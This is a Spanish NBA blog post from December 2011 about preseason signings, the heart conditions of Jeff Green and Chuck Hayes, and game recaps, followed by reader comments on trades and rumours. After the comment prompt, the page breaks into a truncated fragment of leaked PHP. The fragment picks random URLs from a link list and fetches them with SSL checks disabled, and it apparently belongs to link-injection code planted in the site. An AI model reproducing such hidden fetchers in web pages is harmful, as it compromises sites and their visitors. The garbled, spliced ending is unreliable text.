Estamos de pretemporada

19 de December de 2011 por Viva_Dirk

3 días llevamos ya disfrutando de box-scores y highlights. Lejos queda todavía el nivel mínimo exigible a una temporada regular de la NBA pero casi cualquier cosa nos vale para quitarnos el mono y comenzar a ver la vida desde otra óptica. Pero antes de repasar lo que han dado de sí los partidos jugados en estas 3 jornadas (con debut de Ricky Rubio incluído) vamos a echarle un ojo a las principales noticias de los últimos días.

Lo más destacado del mercado han sido los fichajes de Jamal Crawford por los Blazers y de Baron Davis por los Knicks. Los primeros amnistiaron además a Brandon Roy y los segundos no descartan incorporar a Gilbert Arenas. Otro jugador interesante, Nick Young, ha aceptado la oferta cualificada de los Wizards. Esto quiere decir que el año que viene será agente libre sin restricciones y podrá firmar por el equipo que prefiera. Los Nets amnistiaron a Travis Outlaw, que fue casi inmediatamente fichado por los Sacramento Kings. Por su parte, Indiana y Warriors intercambiaron a Brandon Rush y Louis Admunson y los Hornets renovaron a Jason Smith y los Pistons a Rodney Stuckey. Evidentemente, los Lakers no pudieron quedarse fuera del mercado y dar la impresión de estar en un segundo plano y dieron un golpe de autoridad fichando a… Troy Murphy.

Pero la noticia triste ha sido la confirmación de que tanto Jeff Green como Chuck Hayes sufren sendas dolencias cardiacas que de momento ya han provocado que el alero de los Celtics se pierda toda la temporada. El jugador de los Kings se somete hoy y mañana a nuevas pruebas pero no descartéis que también tenga que decir adiós a la temporada, y quien sabe si a su carrera.

Y ahora sí, vamos a ver que dieron de sí esos partidos de pretemporada:

  • Los Knicks ganaron el derby a los Nets con 20 puntos de Balkman, 17 de Melo y 16 del rookie Shumpert, mientras que por los Nets vimos 15 puntos de Morrow y, atención, 15 puntos, 11 rebotes y 5 tapones de Brook Lopez, ¿le habrán hecho una transfusión de sangre?
  • Houston ganó a San Antonio que no contó con Duncan ni Parker. La pareja interior Scola-Hill anotó 37 puntos con 13 capturas de Hill. Terrence Williams completó un buen partido con 14 puntos y 9 rebotes. Por los Spurs fueron Ginobili y Blair los mejores con 16 puntos cada uno.
  • Vimos a Ricky debutar con victoria frente a  los Bucks. El base español completó una buena actuación con 6 puntos, 7 asistencias, 6 rebotes y 2 robos de balón. Love&Beasley anotaron 21 puntos cada uno y Derrick Williams y Barea debutaron con 14. Por los Bucks el rookie John Leuer anotó 18 puntos y Mike Dunleavy 16.
  • GSW ganó a los Kings con 56 puntos de su trio estelar, siendo Curry el mejor con 22-6-6. Por los Kings espectacular debut de Fredette con 21 puntos, 4 rebotes y 4 asistencias,. También 21 puntos anotó Marcus Thornton.
  • Los Bulls ganaron a los Pacers liderados por Derrick Rose y Luol Deng que anotaron 16 puntos cada uno. Por los Pacers hasta 6 hombre sumaron mas de 10 puntos, siendo los mejores Tyler Hansbrough y Paul George con 19-11 y 17-10 respectivamente.
  • Los Sixers pasaron por encima de los Wizars con 19 puntos en 20 minutos de Lou Williams y 16 del jugador de segundo año Evan Turner. En los Wizards solo un jugador llegó a dobles digitos de anotación, Blatche con 18.
  • Los Cavs ganaron a los Pistons con 21 puntos del Nº1 del draft, Kyrie Irving, secundando por Samuels y Jamison con 15 y 13 puntos respectivamente. El máximo anotador de los Pistons fue Daye con 18, Gordon con 17 y Monroe con 12-13 también destacaron.
  • Los Hornets ganaron a los Grizzlies sin sus nuevos fichajes. Jack fue el mejor con 24 puntos, 6 rebotes, 6 asistencias y 3 robos. En unos Grizzlies donde faltaban Conley y Marc, el más destacado fue Tony Allen con 17 puntos.
  • Boston ganó a Toronto por la mínima sin Paul Pierce. Ray Allen y Marquis Daniels lideraron la anotación por los verdes mientras que Bargnani y DeRozan lo hicieron por los canadienses. Destacable el partido de Ed Davis con 10 puntos y 10 rebotes. Calderon jugó 23 minutos y aportó 7 puntos y 6 asistencias.
  • Miami machacó a Orlando con 5 jugadores por encima de 10 puntos. Lebron con 19 puntos y 6 rebotes fue el mejor de los suyos. Por los Magics destacaron Ryan Anderson y JJ Reddick con 22 puntos cada uno.
  • Los Thunders ganaron a unos Mavs sin Nowitzki ni Kidd. Durant se fue hasta los 21 puntos, secundado por Harden&Westbrook. Por los Mavs buen partido de Beaubois y Dominique Jones con 17 puntos cada uno, buen debut de Odom con 14 puntos y 7 rebotes.
Comenta

31 comentarios a esta entrada

  1. rumbero dice:
    #1

    Sin duda la noticia son los 20 puntos de Balkman. Melo-Stat-Renaldo se convierte en el Big Three más temible de todos

      Citar

  2. Vader dice:
    #2

    Jojojo ahora es el momento de traspasarlo!!!

      Citar

  3. GreenPride dice:
    #3

    Buen chiste rumbero!! Un Big Three con Balkman que bueno!!
    A parte de eso decir que la mala suerte ha golpeado con fuerza a dos de los equipos aspirantes quitándoles dos jugadores muy importantes para toda la temporada.
    Por un lado los Celtics se quedan sin su 6º hombre Jeff Green por una lesión de corazón lo que deja su banco maltrecho a no ser que Ainge se saque un conejo de última hora de la chistera fichando a alguien con el salario mínimo que es lo que les queda (lo que parece bastante difícil). Malísima noticia para los de Boston en una conferencia con Heat y Bulls muy fuertes. En principio Green podría volver a jugar el año que viene y los Celtics mantienen sus derechos aunque se ahorran su contrato este año.
    Y en la otra conferencia otro 6º hombre de garantías como Darrel Arthur el suplente de la dupla Marc&Zach que se lesiona en el tendón de aquiles y es baja también para todo el curso. Esto deja al dúo interior de los Grizzlies sin recambios en la pintura. Si al final renuevan a Haddadi necesitarían algún otro jugador pero será difícil que cumpla el rol que desempeñaba tan bien Arthur.
    Por otra parte los Blazers se hacen con un anotador como Crawford al que necesitaban como el comer tras la retirada del infortunadísimo Brandon Roy (a este equipo si que le miró un tuerto hace años y no levanta cabeza)
    Además los Lakers hacen otro movimiento extraño fichando a Troy Murphy. Podría ser un auténtico robo o un auténtico fiasco como les pasó a los Celtics. Veremos si entre él y McRoberts pueden sustituir con éxito el rol de Odom, aunque todo sigue pintando a que algo gordo puede cocerse en los de LA.
    Por último otro movimiento que puede ser importante o fiasco. Baron Davis a los Knicks. Si no tiene problemas físicos y juega al nivel que puede dar sería un jugador importantísimo en los Knicks pero es una apuesta muy arriesgada tanto por su físico como por su cabeza.
    Temporada muy interesante con tanto cambio… y seguro que faltan algunos todavía

      Citar

  4. Sancho88 dice:
    #4

    green, buen análisis de los fichajes. tus celtics tienen mala pinta macho. Sus últimos cuartos en las últimas temporadas son para analizar eh? se hunden de una manera acojonante. al principio de puta madre y al final mueren. Ayer si no es por el palmeo fallado por Bargnani hubieran palmado. No tenían a Pierce, pero lo que hubo ayer es lo que habrá. No les veo progresando demasiado. No tienen nivel para competir con Knicks, MIami o Chicago

      Citar

  5. HisRoyalAirness dice:
    #5

    La noticia es la conversión de López en Mutombo. El cielo es su límite.

    Vi el partido de los Wolves y me confirmó (parcialmente, es pretemporada) lo que llevo pensando 2 años: la NBA està hecha para Ricky. No repartió 12 asistencias porque aùn hay bastante tuercebotas en Minnesota. Y todo en medio partido. Jugó muy desnvuelto, mandando mucho en ataque, reboteando bien y haciendo jugar. Puede estar muy bien Minny este año.
    Y Kevin Love cada día es mejor

      Citar

  6. Txusma dice:
    #6

    GreenPride:
    En principio Green podría volver a jugar el año que viene y los Celtics mantienen sus derechos aunque se ahorran su contrato este año.

    Jeff Green firmó la oferta cualificada, eso quiere decir que será agente libre sin restricciones el año que viene. No sé si el tema de las lesiones de larga duración cambio esto pero lo dudo. Igual que dudo que los Celtics se ahorren su salario, en todo caso obtienen una excepción para que puedan fichar a un jugador por lo mismo que cobraba Green, pero este seguro que cobra su salario religiosamente.

      Citar

  7. Viva_Dirk dice:
    #7

    Si claro, el salario lo cobra pero no de los Celtics, sino de la aseguradora.

      Citar

  8. GreenPride dice:
    #8

    Txusma: Jeff Green firmó la oferta cualificada, eso quiere decir que será agente libre sin restricciones el año que viene. No sé si el tema de las lesiones de larga duración cambio esto pero lo dudo. Igual que dudo que los Celtics se ahorren su salario, en todo caso obtienen una excepción para que puedan fichar a un jugador por lo mismo que cobraba Green, pero este seguro que cobra su salario religiosamente.

    Txusma, si no he leído mal en los medios americanos (ESPN, SportsIlustrated) el caso de Green es excepcional por habérsele detectado su enfermedad en el reconocimento médico posterior a su fichaje. Por tanto, el contrato que firmó queda suspendido, los Celtics no le pagan este año y el año que viene vuelve a ser agente libre restringido para Boston.
    En cuanto a lo que puedan fichar los Celtics, al estar por encima del límite salarial incluso sin el contrato de Green sólo pueden ofrecer el salario mínimo a un jugador que no sea suyo (esto no era así con Green por ser antes jugador de Boston) lo que les limita mucho.
    Ya te digo que esto es lo que he leído en los medios americanos, así que supongo que será así.
    Sancho88, mis Celtics tienen una pinta regular. Seguramente les faltarán piernas para llegar a luchar con los Heat o los Bulls en playoffs y caerán con orgullo en los últimos cuartos ante ellos. Que se le va a hacer se notan los años aunque lo de ayer no tiene nada que ver, que la pretemporada allí es de chichinabo y los Celtics jugaron el último cuarto entero con los suplentes así que no les pasó factura sus años, cosa que sí pasará cuando empiece la temporada. Aun así, creo que si nos encontramos en PO a los Knicks volveremos a mandarlos de vacaciones…

      Citar

  9. Sancho88 dice:
    #9

    que no lo lea esto último melo que le da algo, jaajaj. sobre el tema que estais comentando, yo tenía entendido que un club debe seguir pagando la ficha de un jugador lesionado hasta por lo menos un año después de que por enfermedad no pueda jugar. es decir, deberían seguir pagándole hasta que pase un año desde el último partido de playoffs de la temporada pasada. al menos, en el caso de brandon roy con los blazers es así, hasta marzo o abril no pueden liberar el salario de su ficha y que no les cuente para el límite salarial, pero le tienen que seguir pagando. aunque según poniais aquí le han amnistiado… yo lo último que había leído era esto que estoy explicando

      Citar

  10. Vader dice:
    #10

    Yo soy de los Knicks y hasta que se demuestre lo contrario en una serie con Boston el favorito a dia de hoy es… Boston. Las cosas hay que ganaserlas en la cancha y aunque creo que no digo ninguna locura si afirmo que Knicks va hacia arriba y Boston hacia abajo hay que ganarles en la pista y no antes de empezar. Y hoy por hoy tiene mucho más crédito el equipo de Boston que NY.

    Saludos

      Citar

  11. Len Bias dice:
    #11

    Qué bien se están moviendo los Blazers!

    Felton, Crawford, Kurt Thomas… lo único mal hecho es la renovación de Oden (a priori, ojalá se vea milagro de su recuperación)

      Citar

  12. melo15 dice:
    #12

    buen partido de hill(rockets) alomejor se convierte en el que era en arizona
    Tengo que decir que el robo de ricky fue espectacular como se anticipa y el pase a williams tambien

      Citar

  13. Txusma dice:
    #13

    Gracias GreenPride. Buena información

      Citar

  14. GreenPride dice:
    #14

    Buenas y por desgracia otro caso igual al de Green. Chuck Hayes ha visto como un problema cardiaco le impide jugar y su contrato con los Kings ha sido anulado al ser detectado en el reconocimiento médico. 2 casos iguales en menos de una semana y jugadores que se van a perder la temporada aunque parece que los análisis pretemporada van mejorando y así se evitan casos trágicos del pasado con el de Hank Gathers o el de Reggie Lewis. Una pena, esperemos que el año que viene puedan volver los dos a jugar.
    Sancho88, lo que comentas de que un club debe pagar a un jugador enfermo es cierto, pero tanto Green como Hayes no eran jugadores de Boston y Sacramento ya que eran agentes libres y se les ha detectado sus dolencias en el reconocimiento médico inicial y cómo no lo han pasado su contrato no es válido.
    Anoche por cierto, paliza de los nuevos Clippers a los Lakers, con estos últimos como locales. Es sólo pretemporada y no quiere decir mucho todavía pero seguro que a Kobe no le ha gustado mucho. Billups jugó un gran partido haciendo de escolta al lado de un Paul que se acercó al triple doble. Jordan y Griffin se van a poner morados a machacar aros este año aunque para mí que les sigue faltando un interior de banquillo. Bien Pau y Bynum por los Lakers

      Citar

  15. The wolf dice:
    #15

    la que le ha dado esta noche deandre a bynum y a gasol practicamente solo por el problema de faltas de griffin…aqui va un mate que no os podeis perder

      Citar

  16. Sancho88 dice:
    #16

    Un tal Lamar Odom les hace falta a los Lakers… supongo que estarán preparando un contrato para Kirilenko o algún bombazo por el estilo. Si no este año será la risa

      Citar

  17. rumbero dice:
    #17

    Yo es que veo a los Clippers con Paul-Billups-Williams y los Lakers con Blake-Morris-Fisher y me da la risa.
    Grande Metta World Peace, que se ha cambiado el nombre pero sigue fiel a su estilo: 0/8 en tiros

      Citar

  18. Txusma dice:
    #18

    No supera el 0 de 10 que se cascó Jameer Nelson el otro día…

      Citar

  19. Blade Petrovic dice:
    #19

    Davis a los clippers

      Citar

  20. The wolf dice:
    #20

    clippers? no sera a los knicks?

      Citar

  21. RSB dice:
    #21

    Los Lakers se han hecho el harakiri… Durante mínimo un par de años podrían haber sido aspirantes simplemente haciéndose con algún base decente y algún que otro jugador para la rotación como los que se han traido… Pero con la peor pareja de bases de la Liga, con el nivel actual de Artest y sin Odom… Los veo sufriendo y mucho, mucho

      Citar

  22. Vader dice:
    #22

    The wolf:
    clippers? no sera a los knicks?

    Si es Knicks. Tambien los Knichs ficharan a Novak un tirador alto que estaba en San Antonio. Y otro que suena para la gran manzana es James Posey. El jugador franquicia de los Grizzlies cuando estaba Pau Gasol allí… XD

    Saludos

      Citar

  23. Vader dice:
    #23

    Vader: Si es Knicks. Tambien los Knichs ficharan a Novak un tirador alto que estaba en San Antonio. Y otro que suena para la gran manzana es James Posey. El jugador franquicia de los Grizzlies cuando estaba Pau Gasol allí… XD

    Saludos

    Por cierto un detalle importante… Davids a fichado por el mínimo, así que los Knicks aún tienen la mid-level de 2,5 millones para tratar de fichar algo más. En mi opinión ahora mismo les hace falta algo más por dentro, para dar descano a Chandler & Stat y algún alero que podria ser Posey.

    Saludos

      Citar

  24. Nacho dice:
    #24

    Sancho88: Un tal Lamar Odom les hace falta a los Lakers… supongo que estarán preparando un contrato para Kirilenko o algún bombazo por el estilo. Si no este año será la risa

    ¡Y se nos olvida el entrenador! Porque yo pensaba en LAL y creía que le faltaba gente, pero hasta hace unos días no caí en el head coach, que en definitiva es un tipo que ha demostrado en los Cav’s su sitema de juego, una estrella y los demás a rendirle pleitesía. Igual es el robo del draft, pero no les auguro mucho ni con AK47 (que se irá a los Nets) ni con un posibe retorno de Odom, ni con un base decente, que por otra parte es lo que yo creía que le faltaba a la plantilla. Pero, vamos que no me acordaba de su particular trainer.

      Citar

  25. The wolf dice:
    #25

    ayer los GSW se llevaron un disgustillo bastante alarmante…curry acababa el partido saliendo en muletas por una lesion en el mismo tobillo que se opero este verano…esperemos que solo sea un susto pero como pinte grave van a ser unos partidos dificiles los que esten si este jugon

      Citar

  26. GreenPride dice:
    #26

    Era de esperar, como decíamos hace poco pero los Clippers consiguen también a uno de los jugadores interiores que quedaban en el mercado fichando a Reggie Evans. Distinguido por su intensidad aportará defensa y rebotes para dar descanso a DeAndre Jordan y Griffin. Gran plantilla la que se están haciendo los Clippers que todavía tienen la bala de cambiar a Mo Williams si encuentran algo a cambio que merezca la pena (un dos tirador o un pivot deberían ser sus preferencias)

      Citar

  27. GreenPride dice:
    #27

    Y un rumor muy interesante, trade Boozer-Korver por Pau. Para mí, si los Lakers hacen esto, Kuptchak se habrá vuelto definitivamente loco o bien hay algún problema con Pau que no sabemos. Boozer sólo es comparable a Pau en estadísticas pero en juego y altura la comparación no se admite… y Korver ¿para que ficharon entonces a Kapono? ¿Otro dos cuando Kobe juega 35 minutos mínimo por partido? Dicho lo cual a los Bulls y a Pau les vendría impresionante y para mí pasarían a máximos favoritos junto a los Heat. Rose-RIP-Deng-Pau-Noah un quinteto equilibradísimo y aspirante a todo. No creo que se haga pero ahí queda….

      Citar

  28. Diestro dice:
    #28

    Estoy viendo en twiter que hay un rumor sobre Gasol a los Bulls. Es esto posible?? Hay otra variante que incluye a Orlando en el transpaso, para hacer llegar a Howard a LAL. Yo flipo, creo que es imposible, pero la verdad que me ha alegrado la mañana solo la posibilidad jeje

      Citar

  29. rumbero dice:
    #29

    GreenPride:
    Era de esperar, como decíamos hace poco pero los Clippers consiguen también a uno de los jugadores interiores que quedaban en el mercado fichando a Reggie Evans. Distinguido por su intensidad aportará defensa y rebotes para dar descanso a DeAndre Jordan y Griffin. Gran plantilla la que se están haciendo los Clippers que todavía tienen la bala de cambiar a Mo Williams si encuentran algo a cambio que merezca la pena (un dos tirador o un pivot deberían ser sus preferencias)

    Ojo que ese estan montando un equipo muy serio. A ver si por fin se quitan ya esta aureola de perdedores.

      Citar

  30. Txusma dice:
    #30

    Diestro:
    Estoy viendo en twiter que hay un rumor sobre Gasol a los Bulls. Es esto posible?? Hay otra variante que incluye a Orlando en el transpaso, para hacer llegar a Howard a LAL. Yo flipo, creo que es imposible, pero la verdad que me ha alegrado la mañana solo la posibilidad jeje

    Yo si veo a Gasol no duermo en una semana pero no me creo lo más mínimo ese rumor. Q ganan los Lakers trayéndose a Boozer y a Kapono? Nada. Al principio pensé q era una cuestión salarial pero ni eso. A Boozer le queda un año más de contrato que al español y más o menos el mismo dinero por cobrar (y que no sea más)

      Citar

  31. Denise dice:
    #31

    Tradear a Gasol por Korver y Boozer sería darle el anillo en bandeja a los Bulls (y yo que me alegraria).
    Supongo que de producirse, todo el entorno Lakeriano se echaría encima del GM y de Buss,….excepto Kobe, que ya podría meter tranquilamente sus 30 puntos por noche.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>